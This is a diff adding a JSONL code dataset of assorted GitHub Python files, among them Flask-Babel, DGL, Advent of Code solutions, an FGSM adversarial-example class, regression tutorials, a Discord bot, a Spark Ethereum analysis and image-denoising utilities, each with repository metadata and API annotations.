diff --git "a/1133.jsonl" "b/1133.jsonl"
new file mode 100644
--- /dev/null
+++ "b/1133.jsonl"
@@ -0,0 +1,1149 @@
+{"seq_id": "7492094436", "text": "from flask import Flask, render_template,request\nfrom flask_babel import Babel, _\n\napp = Flask(__name__)\napp.config['BABEL_DEFAULT_LOCALE'] = 'zh'\nbabel = Babel(app)\n\n\n@babel.localeselector\ndef get_locale():\n return request.accept_languages.best_match(['zh', 'en'])\n\n\n@app.route('/')\ndef hello():\n day = _(\"Saturday\")\n\n return render_template('index.html', day=day)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n\"\"\"\n代码汇总:\n\n1、新建babel.cfg:\n[python: **.py]\n[jinja2: **/templates/**.html]\nextensions=jinja2.ext.autoescape,jinja2.ext.with_\n2、生成编译模板\npybabel extract -F babel.cfg -o messages.pot .\n3、翻译\npybabel init -i messages.pot -d translations -l zh_Hans-CN\n4、手动输入中文\nmessages.mo\n5、编译翻译结果\npybabel compile -d translations\n6、更新翻译\npybabel update -i messages.pot -d translations\n\"\"\"", "repo_name": "ddxygq/PyCode", "sub_path": "web/flask/hello-babel/hello.py", "file_name": "hello.py", "file_ext": "py", "file_size_in_byte": 866, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask_babel.Babel", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.accept_languages.best_match", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.request.accept_languages", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "flask_babel._", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "70506096727", "text": "import networkx as nx\nimport dgl\nimport torch as th\n\n# g_nx = nx.petersen_graph()\n# g_dgl = dgl.DGLGraph(g_nx)\n\nimport matplotlib.pyplot as plt\n# plt.subplot(121)\n# nx.draw(g_nx, with_labels=True)\n# plt.subplot(122)\n# nx.draw(g_dgl.to_networkx(), with_labels=True)\n\n# plt.show()\ng = dgl.DGLGraph()\ng.add_nodes(10)\n# A couple edges one-by-one\nfor i in range(1, 4):\n g.add_edge(i, 0)\n# A few more with a paired list\nsrc = list(range(5, 8)); dst = [1]*3\ng.add_edges(src, dst)\n# finish with a pair of tensors\nsrc = th.tensor([8, 9]); dst = th.tensor([0, 0])\ng.add_edges(src, dst)\n\nnx.draw(g.to_networkx(), with_labels=True)\nplt.show()\n\n", "repo_name": "ashishu007/pytorch-stuff", "sub_path": "dglstuff/dgl_ex2.py", "file_name": "dgl_ex2.py", "file_ext": "py", "file_size_in_byte": 635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dgl.DGLGraph", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 24, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "38383583689", "text": "from collections import defaultdict\nfrom typing import Dict, List\n\nfrom aocpuzzle import AoCPuzzle\n\n\nclass Puzzle10(AoCPuzzle):\n def common(self, input_data: List[str]) -> None:\n self.adapters = list(map(int, input_data))\n self.max_rating = max(self.adapters)\n self.target_rating = self.max_rating + 3\n\n def part1(self) -> int:\n adapters = self.adapters[:]\n curr_rating = 0\n\n adapters_left = set()\n adapters_left.add(0)\n\n diff_1, diff_3 = 0, 0\n\n while len(adapters_left) > 0:\n rating = adapters_left.pop()\n\n for next_rating_option in [rating + idx for idx in range(1, 4)]:\n if next_rating_option in adapters:\n difference = next_rating_option - curr_rating\n curr_rating = next_rating_option\n\n if difference == 1:\n diff_1 += 1\n\n if difference == 3 or curr_rating + 3 == self.target_rating:\n diff_3 += 1\n\n adapters.remove(next_rating_option)\n adapters_left.add(next_rating_option)\n return diff_1 * diff_3\n\n def count_ways(self, curr_rating: int) -> int:\n if curr_rating in self.cache:\n return self.cache[curr_rating]\n\n if curr_rating == self.target_rating:\n return 1\n\n count = 0\n\n for next_rating in [a for a in self.adapters if 1 <= a - curr_rating <= 3]:\n count += self.count_ways(next_rating)\n\n self.cache[curr_rating] = count\n\n return count\n\n def part2(self) -> int:\n curr_rating = 0\n self.cache: Dict[int, int] = defaultdict(int)\n self.adapters = self.adapters[:] + [self.target_rating]\n\n return self.count_ways(curr_rating)\n\n def test_cases(self, input_data: List[str]) -> int:\n part1_tests_1 = ['16', '10', '15', '5', '1', '11', '7', '19', '6', '12', '4']\n part1_tests_2 = [\n '28', '33', '18', '42', '31', '14', '46', '20', '48', '47', '24', '23', '49',\n '45', '19', '38', '39', '11', '1', '32', '25', '35', '8', '17', '7', '9', '4',\n '2', '34', '10', '3',\n ]\n\n self.common(part1_tests_1)\n assert self.part1() == 28\n assert self.part2() == 8\n\n self.common(part1_tests_2)\n assert self.part1() == 220\n assert self.part2() == 19208\n\n self.common(input_data)\n assert self.part1() == 2775\n assert self.part2() == 518344341716992\n\n return 3\n", "repo_name": "cpallapolu/advent-of-code", "sub_path": "src/years/2020/10/solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 2548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aocpuzzle.AoCPuzzle", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 58, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 58, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}]}
+{"seq_id": "3604794266", "text": "import torch\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.nn as nn\n\nclass FGSM(object):\n def __init__(self,model):\n self.model = model\n\n def get_loss(self,xi,label_or_target,TARGETED):\n criterion = nn.CrossEntropyLoss()\n output = self.model.predict(xi)\n #print(output, label_or_target)\n loss = criterion(output, label_or_target)\n #print(loss)\n #print(c.size(),modifier.size())\n return loss\n\n def i_fgsm(self, input_xi, label_or_target, eta, TARGETED=False):\n \n yi = Variable(label_or_target.cuda())\n x_adv = Variable(input_xi.cuda(), requires_grad=True)\n for it in range(10):\n error = self.get_loss(x_adv,yi,TARGETED)\n if (it)%1==0:\n print(error.item()) \n self.model.get_gradient(error)\n #print(gradient)\n x_adv.grad.sign_()\n if TARGETED:\n x_adv.data = x_adv.data - eta* x_adv.grad \n else:\n x_adv.data = x_adv.data + eta* x_adv.grad\n #x_adv = Variable(x_adv.data, requires_grad=True)\n #error.backward()\n return x_adv\n\n def fgsm(self, input_xi, label_or_target, eta, TARGETED=False):\n \n yi = Variable(label_or_target.cuda())\n x_adv = Variable(input_xi.cuda(), requires_grad=True)\n\n error = self.get_loss(x_adv,yi,TARGETED)\n print(error.item()) \n self.model.get_gradient(error)\n #print(gradient)\n x_adv.grad.sign_()\n if TARGETED:\n x_adv.data = x_adv.data - eta* x_adv.grad \n else:\n x_adv.data = x_adv.data + eta* x_adv.grad\n #x_adv = Variable(x_adv.data, requires_grad=True)\n #error.backward()\n return x_adv \n\n def __call__(self, input_xi, label_or_target, eta=0.01, TARGETED=False, ITERATIVE=False, epsilon=None):\n if ITERATIVE:\n adv = self.i_fgsm(input_xi, label_or_target, eta, TARGETED)\n else:\n eta = epsilon\n adv = self.fgsm(input_xi, label_or_target, eta, TARGETED)\n return adv \n \n \n", "repo_name": "cmhcbb/attackbox", "sub_path": "attack/FGSM.py", "file_name": "FGSM.py", "file_ext": "py", "file_size_in_byte": 2154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 54, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.CrossEntropyLoss", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "16101342768", "text": "'''\n多项式回归\n'''\n# 多项式回归: 如果数据实际上比简单的直线更复杂,依然可以使用线性模型来拟合非线性数据。\n# 一个简单的方法是对每个特征进行加权后作为新的特征,然后训练一个线性模型在这个扩展的\n# 特征集。\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nm = 100\nX = 6 * np.random.rand(m, 1) - 3\ny = 0.5 * X**2 + X + 2 + np.random.randn(m, 1)\n\nplt.plot(X, y, \"b.\")\nplt.xlabel(\"$x_1$\", fontsize=18)\nplt.ylabel(\"$y$\", rotation=0, fontsize=18)\nplt.axis([-3, 3, 0, 10])\n\nfrom sklearn.preprocessing import PolynomialFeatures\n# 使用 Scikit-Learning 的 PolynomialFeatures 类进行训练数据集的转换,让训练集中每个\n# 特征的���方(2 次多项式)作为新特征。\npoly_features = PolynomialFeatures(degree=2, include_bias=False)\nX_poly = poly_features.fit_transform(X)\n\nprint(X_poly[0])\n\n# X_poly 现在包含原始特征并加上了这个特征的平方 。现在你可以在这个扩展训练集上\n# 使用 LinearRegression 模型进行拟合\n\nfrom sklearn.linear_model import LinearRegression\n\nlin_reg = LinearRegression()\nlin_reg.fit(X_poly, y)\nprint(lin_reg.intercept_, lin_reg.coef_)\n\nX_new=np.linspace(-3, 3, 100).reshape(100, 1)\nX_new_poly = poly_features.transform(X_new)\ny_new = lin_reg.predict(X_new_poly)\nplt.plot(X, y, \"b.\")\nplt.plot(X_new, y_new, \"r-\", linewidth=2, label=\"Predictions\")\nplt.xlabel(\"$x_1$\", fontsize=18)\nplt.ylabel(\"$y$\", rotation=0, fontsize=18)\nplt.legend(loc=\"upper left\", fontsize=14)\nplt.axis([-3, 3, 0, 10])\nplt.show()\n\n# 可以使用交叉验证来估计一个模型的泛化能力,另一种方法是观察学习曲线:画出模型在训练集上\n# 的表现,同时画出以训练集规模为自变量的训练集函数\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\ndef plot_learning_curves(model, X, y):\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2)\n train_errors, val_errors = [], []\n for m in range(1, len(X_train)):\n model.fit(X_train[:m], y_train[:m])\n y_train_predict = model.predict(X_train[:m])\n y_val_predict = model.predict(X_val)\n train_errors.append(mean_squared_error(y_train_predict, y_train[:m]))\n val_errors.append(mean_squared_error(y_val_predict, y_val))\n\n plt.xlabel(\"Training set size\", fontsize=18)\n plt.ylabel(\"RMSE\", rotation=0, fontsize=18)\n plt.plot(np.sqrt(train_errors), \"r-+\", linewidth=2, label=\"train\")\n plt.plot(np.sqrt(val_errors), \"b-\", linewidth=3, label=\"val\")\n\n\n# 简单线性回归模型的学习曲线\nlin_reg = LinearRegression()\nplot_learning_curves(lin_reg, X, y)\n\n# 上面的曲线表现了一个典型的欠拟合模型,两条曲线都到达高原地带并趋于稳定,并且最后\n# 两条曲线非常接近,同时误差值非常大。\n\nplt.show()\n\n# 在统计和机器学习领域有个重要的理论:一个模型的泛化误差由三个不同误差的和决\n# 定:\n# 偏差:泛化误差的这部分误差是由于错误的假设决定的。例如实际是一个二次模型,\n# 你却假设了一个线性模型。一个高偏差的模型最容易出现欠拟合。\n# 方差:这部分误差是由于模型对训练数据的微小变化较为敏感,一个多自由度的模\n# 型更容易有高的方差(例如一个高阶多项式模型),因此会导致模型过拟合。\n# 不可约误差:这部分误差是由于数据本身的噪声决定的。降低这部分误差的唯一方\n# 法就是进行数据清洗(例如:修复数据源,修复坏的传感器,识别和剔除异常值)。", "repo_name": "applepip/machine_learning", "sub_path": "model_training/Polynomial_model_training.py", "file_name": "Polynomial_model_training.py", "file_ext": "py", "file_size_in_byte": 3676, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.random.rand", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 55, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "543568971", "text": "from django.shortcuts import render\n\n\ndef list_children(page):\n html = '
{title} '.format(url=page.url, title=page.title)\n children = page.get_children().live().public().order_by('path')\n for child in children:\n html += list_children(child)\n html += ' '\n return html\n\n\ndef sitemap_view(request):\n root_page = request.site.root_page\n\n html = list_children(root_page)\n\n return render(request, 'sitemap.html', {'sitemap_html': html})\n", "repo_name": "City-of-Helsinki/digihel", "sub_path": "digi/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 497, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "69889118810", "text": "import discord\r\nimport random\r\nfrom discord.ext import commands\r\n\r\n\r\nintents = discord.Intents.default()\r\nintents.message_content = True\r\n\r\nbot = commands.Bot(command_prefix='!', intents=intents)\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(f'We have logged in as {bot.user}')\r\n\r\n@bot.command()\r\nasync def hello(ctx):\r\n await ctx.send(f'Привет! Я бот {bot.user}!')\r\n\r\n@bot.command(description='For when you wanna settle the score some other way')\r\nasync def choose(ctx, *choices: str):\r\n \"\"\"Chooses between multiple choices.\"\"\"\r\n await ctx.send(random.choice(choices))\r\n\r\n@bot.command()\r\nasync def heh(ctx, count_heh = 5):\r\n await ctx.send(\"he\" * count_heh)\r\n\r\n@bot.command()\r\nasync def joined(ctx, member: discord.Member):\r\n \"\"\"Says when a member joined.\"\"\"\r\n await ctx.send(f'{member.name} joined {discord.utils.format_dt(member.joined_at)}')\r\n\r\n@bot.command()\r\nasync def guess(ctx, count:int):\r\n answer = random.randint(1,10)\r\n if count == answer:\r\n await ctx.send('Right!')\r\n else:\r\n await ctx.send(f'Nah, no! The answer was {answer}.')\r\n\r\n@bot.command()\r\nasync def repeat(ctx, times: int, content='repeating...'):\r\n \"\"\"Repeats a message multiple times.\"\"\"\r\n for i in range(times):\r\n await ctx.send(content)\r\n\r\n\r\nbot.run(\"Token\")\r\n", "repo_name": "yernur0/DiscordBot2", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 1302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "discord.Intents.default", "line_number": 6, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 6, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Bot", "line_number": 9, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 9, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 29, "usage_type": "attribute"}, {"api_name": "discord.utils.format_dt", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 31, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "39093431822", "text": "import sys, string\nimport os\nimport socket\nimport time\nimport operator\nimport boto3\nimport json\nfrom pyspark.sql import SparkSession\nfrom datetime import datetime\nimport pyspark.sql.functions as F\n\nif __name__ == \"__main__\":\n\n spark = SparkSession\\\n .builder\\\n .appName(\"Ethereum\")\\\n .getOrCreate()\n\n def check_transactions(line):\n try:\n fields = line.split(',')\n if len(fields)!=15:\n return False\n \n float(fields[7])\n return True\n except:\n return False\n\n \n\n s3_data_repository_bucket = os.environ['DATA_REPOSITORY_BUCKET']\n\n s3_endpoint_url = os.environ['S3_ENDPOINT_URL']+':'+os.environ['BUCKET_PORT']\n s3_access_key_id = os.environ['AWS_ACCESS_KEY_ID']\n s3_secret_access_key = os.environ['AWS_SECRET_ACCESS_KEY']\n s3_bucket = os.environ['BUCKET_NAME']\n\n hadoopConf = spark.sparkContext._jsc.hadoopConfiguration()\n hadoopConf.set(\"fs.s3a.endpoint\", s3_endpoint_url)\n hadoopConf.set(\"fs.s3a.access.key\", s3_access_key_id)\n hadoopConf.set(\"fs.s3a.secret.key\", s3_secret_access_key)\n hadoopConf.set(\"fs.s3a.path.style.access\", \"true\")\n hadoopConf.set(\"fs.s3a.connection.ssl.enabled\", \"false\") \n \n \n \n transactions = spark.sparkContext.textFile(\"s3a://\" + s3_data_repository_bucket + \"/ECS765/ethereum-parvulus/transactions.csv\")\n trans = transactions.filter(check_transactions)\n \n trans_map = trans.map(lambda x: (x.split(',')[5], x.split(',')[6], x.split(',')[7], x.split(',')[11]))\n naming_columns = ['from_address', 'to_address', 'value',' timestamp']\n DataFrame = trans_map.toDF(naming_columns)\n df = DataFrame.filter(F.col('from_address') == F.col('to_address'))\n trans_rdd = df.rdd.map(lambda x: ((x[0],x[1]), float(x[2])))\n output = trans_rdd.reduceByKey(lambda x, y: x+y)\n top10 = output.takeOrdered(10, key = lambda x: -x[1])\n \n my_bucket_resource = boto3.resource('s3',\n endpoint_url='http://' + s3_endpoint_url,\n aws_access_key_id=s3_access_key_id,\n aws_secret_access_key=s3_secret_access_key)\n\n \n now = datetime.now() # current date and time\n date_time = now.strftime(\"%d-%m-%Y_%H:%M:%S\")\n \n my_result_object = my_bucket_resource.Object(s3_bucket,'ethereum_partd3_' + date_time + '/top10_washtrade.txt')\n my_result_object.put(Body=json.dumps(top10))\n\n \n spark.stop()\n", "repo_name": "sunrita007/Big-Data-Project", "sub_path": "Big Data CW 2/Part D/Wash Trading/wash_trading.py", "file_name": "wash_trading.py", "file_ext": "py", "file_size_in_byte": 2441, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 14, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 14, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pyspark.sql.functions.col", "line_number": 54, "usage_type": "call"}, {"api_name": "pyspark.sql.functions", "line_number": 54, "usage_type": "name"}, {"api_name": "boto3.resource", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime.now", 
"line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "39115231406", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAdvent of code 2021, day x\nblackstream-x’ solution\n\"\"\"\n\n\nimport logging\n\nimport helpers\n\n\nSPAWN_PERIOD = 7\nNEW_FISH = 8\n\n\ndef spawn_days(initial_count, days):\n \"\"\"Days when a fish with initial_count spawns\"\"\"\n return range(initial_count + 1, days + 1, SPAWN_PERIOD)\n\n\ndef population_after(days, fishes):\n \"\"\"Return the population count after {days} days\"\"\"\n population = len(fishes)\n spawn_events = [None] + [0] * days\n for fish in fishes:\n for day in spawn_days(fish, days):\n spawn_events[day] += 1\n #\n #\n for day in range(1, days + 1):\n new_fish = spawn_events[day]\n logging.debug(\"Day #%s: %s spawned\", day, new_fish)\n population += new_fish\n for days_offset in spawn_days(NEW_FISH, days - day):\n spawn_events[day + days_offset] += new_fish\n #\n #\n return population\n\n\n@helpers.timer\ndef part1(reader):\n \"\"\"Part 1\"\"\"\n days = 80\n for line in reader.lines():\n fishes = [int(item) for item in line.split(\",\")]\n return population_after(days, fishes)\n #\n\n\n@helpers.timer\ndef part2(reader):\n \"\"\"Part 2\"\"\"\n days = 256\n for line in reader.lines():\n fishes = [int(item) for item in line.split(\",\")]\n return population_after(days, fishes)\n #\n\n\nif __name__ == \"__main__\":\n helpers.solve_puzzle(part1, part2)\n\n\n# vim: fileencoding=utf-8 sw=4 ts=4 sts=4 expandtab autoindent syntax=python:\n", "repo_name": "blackstream-x/advent-of-code2021", "sub_path": "solutions/day6.py", "file_name": "day6.py", "file_ext": "py", "file_size_in_byte": 1489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.debug", "line_number": 35, "usage_type": "call"}, {"api_name": "helpers.timer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "helpers.timer", "line_number": 54, "usage_type": "attribute"}, {"api_name": "helpers.solve_puzzle", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "13711264148", "text": "import gc\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nimport random\n\n\nclass train_data():\n def __init__(self, filepath):\n self.filepath = filepath\n assert '.npy' in filepath\n if not os.path.exists(filepath):\n print(\"[!] Data file not exists\")\n sys.exit(1)\n\n def __enter__(self):\n print(\"[*] Loading data...\")\n self.data = np.load(self.filepath)\n np.random.shuffle(self.data)\n print(\"[*] Load successfully...\")\n return self.data\n\n def __exit__(self, type, value, trace):\n del self.data\n gc.collect()\n print(\"In __exit__()\")\n\n\ndef load_data(filepath):\n return train_data(filepath=filepath)\n\n\ndef load_images(filelist):\n if not isinstance(filelist, list):\n im = Image.open(filelist).convert('L')\n return np.array(im).reshape(1, im.size[1], im.size[0], 1)\n data = []\n for file in filelist:\n im = Image.open(file).convert('L')\n data.append(np.array(im).reshape(1, im.size[1], im.size[0], 1))\n return data\n\n\ndef save_images(filepath, ground_truth, noisy_image=None, clean_image=None):\n ground_truth = np.squeeze(ground_truth)\n noisy_image = np.squeeze(noisy_image)\n clean_image = np.squeeze(clean_image)\n if not clean_image.any():\n cat_image = ground_truth\n else:\n cat_image = np.concatenate([ground_truth, noisy_image, clean_image], axis=1)\n im = Image.fromarray(cat_image.astype('uint8')).convert('L')\n im.save(filepath, 'png')\n\n\ndef tf_psnr(im1, im2):\n mse = tf.losses.mean_squared_error(labels=im2 * 255.0, predictions=im1 * 255.0)\n psnr = 10.0 * (tf.log(255.0 ** 2 / mse) / tf.log(10.0))\n return psnr\n\n\ndef cal_psnr(im1, im2):\n mse = ((im1.astype(np.float) - im2.astype(np.float)) ** 2).mean()\n psnr = 10 * np.log10(255 ** 2 / mse)\n return psnr\n\n\ndef np_psnr(im1, im2):\n mse = (((im1.astype(np.float))*255.0 - (im2.astype(np.float))*255.0) ** 2).mean()\n psnr = 10 * np.log10(255 ** 2 / mse)\n return psnr\n\n\ndef np_mpsnr(img1, img2):\n mse = np.zeros(img1.shape[2])\n psnr = np.zeros(img1.shape[2])\n for i in range(img1.shape[2]):\n im1 = img1[:,:,i]\n im2 = img2[:,:,i]\n mse[i]= (((im1.astype(np.float))*255.0 - (im2.astype(np.float))*255.0) ** 2).mean()\n psnr[i] = 10 * np.log10(255 ** 2 / mse[i])\n return np.mean(psnr)\n\n\ndef salt_and_pepper_noise(img, proportion):\n noise_img =img\n height,width =noise_img.shape[0],noise_img.shape[1]\n num = int(height*width*proportion)\n for i in range(num):\n w = random.randint(0,width-1)\n h = random.randint(0,height-1)\n if random.randint(0,1) ==0:\n noise_img[h,w] = 0\n else:\n noise_img[h,w] = 1\n return noise_img", "repo_name": "lzz11834/SGIDN", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2804, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.exists", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "attribute"}, {"api_name": "gc.collect", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.array", 
"line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}, {"api_name": "tensorflow.losses.mean_squared_error", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.losses", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.log", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.log10", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.log10", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.log10", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 84, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 93, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 94, "usage_type": "call"}]}
